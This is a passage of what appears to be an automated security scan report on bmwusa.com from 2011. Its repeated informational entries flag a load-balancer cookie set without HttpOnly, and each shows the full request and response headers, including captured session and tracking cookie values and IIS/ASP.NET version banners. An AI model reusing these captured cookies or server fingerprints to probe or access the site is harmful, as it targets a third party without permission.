<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.170. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/1seriescoupemediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/135icoupe/1seriescoupemediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:26 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/135icoupe/1seriescoupemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:26 GMT;path=/
Content-Length: 201997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.171. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/135icoupe/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:26 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/135icoupe/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:26 GMT;path=/
Content-Length: 213259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.172. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/135icoupe/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:33 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/135icoupe/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:33 GMT;path=/
Content-Length: 225720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.173. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/135icoupe/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:25 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/135icoupe/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:25 GMT;path=/
Content-Length: 214974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.174. http://www.bmwusa.com/standard/content/vehicles/2011/1/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:20 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:20 GMT;path=/
Content-Length: 200292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.175. http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/3seriesconvertiblemediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328iconvertible/3seriesconvertiblemediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:49:38 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328iconvertible/3seriesconvertiblemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:29:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:49:38 GMT;path=/
Content-Length: 202520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.176. http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328iconvertible/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:49:20 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328iconvertible/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:29:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:49:20 GMT;path=/
Content-Length: 214887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.177. http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328iconvertible/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:49:51 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328iconvertible/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:29:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:49:51 GMT;path=/
Content-Length: 226399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.178. http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328iconvertible/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:49:23 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328iconvertible/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:29:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:49:23 GMT;path=/
Content-Length: 216239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.179. http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/3seriescoupemediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328icoupe/3seriescoupemediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:39:58 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328icoupe/3seriescoupemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:19:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:39:58 GMT;path=/
Content-Length: 202158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.180. http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328icoupe/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:38:40 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328icoupe/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:18:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:38:40 GMT;path=/
Content-Length: 212973

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.181. http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328icoupe/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:07 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328icoupe/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:21:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:07 GMT;path=/
Content-Length: 200604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.182. http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328icoupe/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:38:59 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328icoupe/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:18:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:38:59 GMT;path=/
Content-Length: 215188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.183. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/3seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328isedan/3seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:08:05 GMT;path=/

